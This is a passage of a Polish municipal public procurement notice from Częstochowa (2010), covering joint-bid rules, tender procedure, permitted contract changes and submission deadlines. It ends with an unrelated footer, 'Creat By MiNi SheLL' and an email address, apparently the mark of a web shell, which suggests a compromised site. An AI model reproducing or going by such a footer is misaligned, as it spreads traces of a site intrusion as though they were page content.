Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza  to, że jeżeli upoważnienie takie nie wynika wprost z  dokumentu stwierdzającego status prawny Wykonawcy (odpisu z  właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie. 

Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.

UWAGA 3:
W przypadku składania oferty wspólnej przez kilku przedsiębiorców, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie 6 ppkt 1) oraz w punkcie 6 ppkt 5) lit. d) specyfikacji istotnych warunków zamówienia. W  przypadku składania kopii tych dokumentów, kopie te winny być poświadczone za zgodność z oryginałem przez wspólników. Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do  oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. Będą to, przykładowo, okoliczności:
a) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację wykonanego przedmiotu umowy;
b) powodujące poprawienie parametrów technicznych;
c) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń. 
2. W przypadku urzędowej zmiany stawki podatku VAT, strony zobowiązują się do podpisania aneksu do umowy, regulującego wysokość podatku VAT.
3. Terminy wykonania i odbioru robót ustalone w § 4 ust. 1 umowy ulegną przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a) przestojów i opóźnień zawinionych przez Zamawiającego;
b) działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającego bezpośredni wpływ na terminowość wykonywania robót;
c) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
d) wykopalisk uniemożliwiających wykonywanie robót;
4. W przedstawionych przypadkach wystąpienia opóźnień, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju.
5. Istnieje możliwość dokonania zmiany kierownika budowy oraz pozostałych osób przedstawionych w ofercie przetargowej, jedynie za uprzednią pisemną zgodą Zamawiającego.
6. Wykonawca z własnej inicjatywy proponuje zmianę osób wyszczególnionych w § 6 ust. 3 umowy w następujących przypadkach:
a) śmierci, choroby lub innych zdarzeń losowych;
b) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy.
7. W przypadku zmiany osób wyszczególnionych w § 6 ust. 3 umowy, nowe osoby powołane do pełnienia ww. obowiązków muszą spełniać wymagania określone w specyfikacji istotnych warunków zamówienia dla danej funkcji.
8. Zamawiający może także zażądać od Wykonawcy zmiany osób, o których mowa w § 6 ust. 3 umowy, jeżeli uzna, że nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych  osób w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://czestochowa.bip-gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Adres e-mail: jmusial@czestochowa.um.gov.pl oraz Urząd Miasta Częstochowy, Wydział Inwestycji i Zamówień Publicznych, pokój nr 417, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 10:30, miejsce: Urząd Miasta Częstochowy Biuro Obsługi Interesanta (parter), stanowisko nr 7, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Specyfikacja istotnych warunków zamówienia będzie dostępna na stronie internetowej Zamawiającego: http://czestochowa.bip-gov.pl Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, modyfikacje SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com